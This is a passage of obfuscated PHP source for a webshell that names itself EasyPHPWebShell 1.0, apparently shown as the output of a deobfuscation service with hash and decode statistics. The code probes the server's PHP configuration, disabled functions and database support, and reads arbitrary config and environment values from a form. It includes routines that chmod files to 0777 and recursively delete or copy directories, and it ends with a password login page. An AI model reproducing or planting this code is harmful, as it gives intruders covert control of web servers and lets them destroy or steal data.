ush7(base64_decode('ZGlzYWJsZV9mdW5jdGlvbnM='),1));$wyyf58[0]=array(base64_decode('TVlTUUw='),wush7(base64_decode('bXlzcWxfY2xvc2U='),2));$wyyf58[1]=array(base64_decode('T3JhY2xl'),wush7(base64_decode('b3JhX2Nsb3Nl'),2));$wyyf58[2]=array(base64_decode('T3JhY2xlIDg='),wush7(base64_decode('T0NJTG9nT2Zm'),2));$wyyf58[3]=array(base64_decode('T0JEQw=='),wush7(base64_decode('b2RiY19jbG9zZQ=='),2));$wyyf58[4]=array(base64_decode('U3lCYXNl'),wush7(base64_decode('c3liYXNlX2Nsb3Nl'),2));$wyyf58[5]=array(base64_decode('U1FMX1NlcnZlcg=='),wush7(base64_decode('bXNzcWxfY2xvc2U='),2));$wyyf58[6]=array(base64_decode('REJhc2U='),wush7(base64_decode('ZGJhc2VfY2xvc2U='),2));$wyyf58[7]=array(base64_decode('SHlwZXJ3YXZl'),wush7(base64_decode('aHdfY2xvc2U='),2));$wyyf58[8]=array(base64_decode('UG9zdGdyZV9TUUw='),wush7(base64_decode('cGdfY2xvc2U='),2));$vcth59[0]=array(base64_decode('U2Vzc2lvbuaUr+aMgQ=='),wush7(base64_decode('c2Vzc2lvbl9zdGFydA=='),2));$vcth59[1]=array(base64_decode('U29ja2V05pSv5oyB'),wush7(base64_decode('ZnNvY2tvcGVu'),2));$vcth59[2]=array(base64_decode('5Y6L57yp5paH5Lu25pSv5oyBKFpsaWIp'),wush7(base64_decode('Z3pjbG9zZQ=='),2));$vcth59[3]=array(base64_decode('U01UUOaUr+aMgQ=='),wush7(base64_decode('c210cA=='),2));$vcth59[4]=array(base64_decode('WE1M5pSv5oyB'),wush7(base64_decode('WE1MIFN1cHBvcnQ='),3));$vcth59[5]=array(base64_decode('RlRQ5pSv5oyB'),wush7(base64_decode('RlRQIHN1cHBvcnQ='),3));$vcth59[6]=array(base64_decode('U2VuZG1haWzmlK/mjIE='),wush7(base64_decode('SW50ZXJuYWwgU2VuZG1haWwgU3VwcG9ydCBmb3IgV2luZG93cyA0'),3));$vcth59[7]=array(base64_decode('U05NUOaUr+aMgQ=='),wush7(base64_decode('c25tcGdldA=='),2));$vcth59[8]=array(base64_decode('UERG5paH5qGj5pSv5oyB'),wush7(base64_decode('cGRmX2Nsb3Nl'),2));$vcth59[9]=array(base64_decode('SU1BUOeUteWtkOmCruS7tuaUr+aMgQ=='),wush7(base64_decode('aW1hcF9jbG9zZQ=='),2));$vcth59[10]=array(base64_decode('5Zu+5b2i5aSE55CGR0QgTGlicmFyeeaUr+aMgQ=='),wush7(base64_decode('aW1hZ2VsaW5l'),2));$vcth59[11]=array(base64_decode('WkVOROaUr+aMgQ=='),wush7(base64_decode('emVuZF92ZXJzaW9u'),2).base64_decode('KA==').zend_version().base64_decode('KQ=='));$vcth59[12]=array(base64_decode('5YWB6K645L2/55SoVVJM5omT5byA5paH5Lu2'),wush7(base64_decode('YWxsb3dfdXJsX2ZvcGVu'),2));$vcth59[13]=array(base64_decode('UFJFTOebuOWuueivreazlSBQQ1JF'),wush7(base64_decode('cHJlZ19tYXRjaA=='),2));$vcth59[14]=array(base64_decode('5pi+56S66ZSZ6K+v5L+h5oGv'),wush7(base64_decode('ZGlzcGxheV9lcnJvcnM='),2));$vcth59[15]=array(base64_decode('6Ieq5Yqo5a6a5LmJ5YWo5bGA5Y+Y6YeP'),wush7(base64_decode('cmVnaXN0ZXJfZ2xvYmFscw=='),2));$vcth59[16]=array(base64_decode('UEhQ6L+Q6KGM5pa55byP'),strtoupper(php_sapi_name()));?>
<tr>
<td align="center" bgcolor="#EEEEEE">
<table width="600" border="0" cellpadding="0" cellspacing="0"><br>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2"></td></tr>
<? for($msvh5a=0;$msvh5a<15;$msvh5a++){$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\"><td>{$lgxq57[$msvh5a][0]}</td><td>{$lgxq57[$msvh5a][1]}</td></tr>";}?>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2"></td></tr>
<? for($msvh5a=0;$msvh5a<9;$msvh5a++){$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\"><td>{$wyyf58[$msvh5a][0]}</td><td>{$wyyf58[$msvh5a][1]}</td></tr>";}?>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2"></td></tr>
<? for($msvh5a=0;$msvh5a<17;$msvh5a++){$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\"><td>{$vcth59[$msvh5a][0]}</td><td>{$vcth59[$msvh5a][1]}</td></tr>";}?>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">PHP(",")</td></tr>
<tr bgcolor="#EEEEEE">
<form method="post" action="?action=env" enctype="multipart/form-data">
<td colspan="2">ProgIdClassId:
<input name="envname" type="text" size="50" class="style1" value=<?=isset($psta5b)?$psta5b:'';?>>
<input name="envnameb" type="submit" value="" class="style1">
</td>
</form>
</tr>
<? if(isset($psta5b)&&!empty($psta5b)){$psta5b=explode(base64_decode('LA=='),$psta5b);$msvh5a=0;while($psta5b[$msvh5a]){echo"<tr bgcolor=\"#CCCCCC\"><td colspan=\"2\">[{$psta5b[$msvh5a]}]:</td></tr>";echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRfY2ZnX3ZhcuaWueW8jzwvdGQ+PHRkPg==').wush7($psta5b[$msvh5a],1).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5mdW5jdGlvbl9leGlzdHPmlrnlvI88L3RkPjx0ZD4=').wush7($psta5b[$msvh5a],2).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRfbWFnaWNfcXVvdGVzX2dwY+aWueW8jzwvdGQ+PHRkPg==').wush7($psta5b[$msvh5a],3).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWXmlrnlvI88L3RkPjx0ZD4=').wush7($psta5b[$msvh5a],4).base64_decode('PC90ZD48L3RyPg==');echo base64_decode('PHRyIGJnY29sb3I9IiNFRUVFRUUiPjx0ZD5HZXRlbnbmlrnlvI88L3RkPjx0ZD4=').wush7($psta5b[$msvh5a],5).base64_decode('PC90ZD48L3RyPg==');$msvh5a++;}}?>
</table><br>
</td>
</tr>
</table>
<? }else{echo base64_decode('6ZSZ6K+v55qE5o+Q5Lqk5Y+C5pWwPC90ZD48L3RyPjx0cj48dGQgYWxpZ249ImNlbnRlciIgYmdjb2xvcj0iI0VFRUVFRSI+PGJyPjxhIGhyZWY9Ij9hY3Rpb249ZGlyJmRpcj0=').urlencode($hyph18).base64_decode('Ij7ngrnmraTov5Tlm57mlofku7bmtY/op4jpobXpnaI8L2E+PHA+PC90ZD48L3RyPjwvdGFibGU+');}bmnb5();@ob_end_flush();?>
<? function mwkb0(&$susi5c){while(list($dgzl11,$gpfu5d)=each($susi5c)){if((strtoupper($dgzl11)!=$dgzl11||''.intval($dgzl11)=="$dgzl11")&&$dgzl11!=base64_decode('YXJnYw==')&&$dgzl11!=base64_decode('YXJndg==')){if(is_string($gpfu5d))$susi5c[$dgzl11]=stripslashes($gpfu5d);if(is_array($gpfu5d))$susi5c[$dgzl11]=mwkb0($gpfu5d);}}return $susi5c;}function seko1($jofa5e){$xfhy5f=@opendir($jofa5e);while($jtgg60=@readdir($xfhy5f)){if((is_dir("$jofa5e/$jtgg60"))&&($jtgg60!=base64_decode('Lg=='))&&($jtgg60!=base64_decode('Li4='))){if(!seko1("$jofa5e/$jtgg60"))return false;}else if(!is_dir("$jofa5e/$jtgg60")){@chmod("$jofa5e/$jtgg60",0777);if(!@unlink("$jofa5e/$jtgg60"))return false;}}@closedir($xfhy5f);@chmod("$jofa5e",0777);if(!@rmdir($jofa5e))return false;return true;}function lzcl2($doer61,$dnfn62){$xfhy5f=@opendir($doer61);while($jtgg60=@readdir($xfhy5f)){if((is_dir("$doer61/$jtgg60"))&&($jtgg60!=base64_decode('Lg=='))&&($jtgg60!=base64_decode('Li4='))){if(!file_exists("$dnfn62/$jtgg60"))if(!@mkdir("$dnfn62/$jtgg60"))return false;if(!lzcl2("$doer61/$jtgg60","$dnfn62/$jtgg60"))return false;}else if(!is_dir("$doer61/$jtgg60"))if(!@copy("$doer61/$jtgg60","$dnfn62/$jtgg60"))return false;}return true;}function wstv3($scnf63){if(file_exists($scnf63))return true;else{if(wstv3(@dirname($scnf63))){if(@mkdir($scnf63))return true;else return false;}else return false;}}function inxl4(){global $vpqta;$vpqta=explode(base64_decode('IA=='),$vpqta);$eypq64=explode(base64_decode('IA=='),@microtime());return($eypq64[0]-$vpqta[0]+$eypq64[1]-$vpqta[1]);}function bmnb5(){echo base64_decode('PGJyPjxjZW50ZXI+6aG16Z2i5omn6KGM5pe26Ze0Og==').inxl4().base64_decode('IOenkjxicj4=').base64_decode('PHNwYW4gY2xhc3MgPSAic3R5bGVidGV4dDIiPkVhc3lQSFBXZWJTaGVsbCAxLjAoUzhTOOa1i+ivleeJiCk8L3NwYW4+PGJyPuiEmuacrOeUsSA8Yj7nvZHnu5zmioDmnK/orrrlnZsoPGEgaHJlZj0iaHR0cDovL3d3dy5zOHM4Lm5ldCI+aHR0cDovL3d3dy5zOHM4Lm5ldDwvYT4pIFpWKDxhIGhyZWY9Im1haWx0bzp6dnJvcEAxNjMuY29tIj56dnJvcEAxNjMuY29tPC9hPik8L2I+IOe8luWGmTxicj4=').base64_decode('Q29weXJpZ2h0IChDKSAyMDA0IHd3dy5zOHM4Lm5ldCBBbGwgUmlnaHRzIFJlc2VydmVkLjwvY2VudGVyPg==');}function hhoa6($scnf63){return str_replace(base64_decode('XA=='),base64_decode('Lw=='),@realpath($scnf63));}function wush7($huyj65,$ofwy66){global $srld1d,$kpfb1e;$ofoy42=($ofwy66==1)?@get_cfg_var($huyj65):(($ofwy66==2)?@function_exists($huyj65):(($ofwy66==3)?@get_magic_quotes_gpc($huyj65):(($ofwy66==4)?@get_magic_quotes_runtime($huyj65):(($ofwy66==5)?@Getenv($huyj65):base64_decode('ZXJyb3Ih')))));return($ofoy42==1)?$srld1d:(($ofoy42==0)?$kpfb1e:$ofoy42);}function nbcj8($vykb67){return $vykb67==base64_decode('I0NDQ0NDQw==')?base64_decode('I0VFRUVFRQ=='):base64_decode('I0NDQ0NDQw==');}function deyv9(){?>
<br><br><br><br><br><br><br>
<table align="center" width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center" bgcolor="#000000" class="stylebtext3">
,
</td>
</tr>
<tr>
<form method="post" action="?action=login" enctype="multipart/form-data">
<td align="center" class="style1"><br>
<input name="pmy_password" type="password" size="30" class="style1"><p>
<input name="pmy_passwordb" type="submit" value=" " class="style1"><p>
</td>
</tr>
</table>
<? exit;}
Function Calls
set_time_limit | 1 |
Stats
MD5 | 826564cbe39cd938586faa4ecca33947 |
Eval Count | 0 |
Decode Time | 198 ms |